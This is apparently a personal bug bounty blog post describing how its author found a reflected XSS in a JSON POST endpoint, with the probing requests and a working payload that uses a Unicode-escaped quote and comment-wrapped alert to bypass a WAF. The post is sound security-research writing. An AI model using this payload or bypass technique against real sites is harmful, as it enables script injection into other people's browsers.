Hi, welcome to my first blog! In this post, I will share my experience of discovering a Reflected XSS vulnerability in a public Bugcrowd program. Let's dive into the details of this XSS vulnerability.
In this article, we'll walk through the mechanics of Reflected XSS, its potential impact, and a practical example that shows how the vulnerability works.
First, I observed a POST request that sends data in JSON format to fetch information from the server. Here is our attack vector:
POST /endpoint HTTP/2
Host: www.example.com
Accept: */*
Content-Length: 208
{"modalData":{
"image":"https://test.com",
"title":"fooo",
"price":"",
"quantity":1,
"subTotal":"",
"totalQuantity":1,
"loyaltyPionts":25
}
}
I then injected a unique marker into every value and analyzed what was reflected in the response. Every value was reflected inside the [ <dialog> ] and [ <modal-dialog> ] elements, and all of them were HTML-encoded on output, except for the [ image ] value.
POST /endpoint HTTP/2
Host: www.example.com
Accept: */*
Content-Length: 208
{"modalData":{
"image":"https://test.comRezk1><",
"title":"foooRezk2><",
"price":"Rezk3><",
"quantity":"1Rezk4><",
"subTotal":"Rezk5><",
"totalQuantity":"Rezk6><",
"loyaltyPionts":"Rezk7><"
}
}
Next, I injected an XSS payload, converting the quotation mark [ " ] to its Unicode escape (\u0022) so the JSON parser would turn it back into a literal quote, and wrapping the ` alert ` call in JavaScript comments [ /**/ ] to bypass the WAF. This approach worked. 😄
"Rezk\u0022></dialog></modal-dialog><h1>This Is A Malicious</h1><input type=hidden
oncontentvisibilityautostatechange=/**/alert/**/(document.location)
style=content-visibility:auto>"
In conclusion, remember to use fuzzing and automation, but don’t underestimate the power of manual testing.
Please don’t forget to follow me!
Unfortunately, we have received this report from another researcher.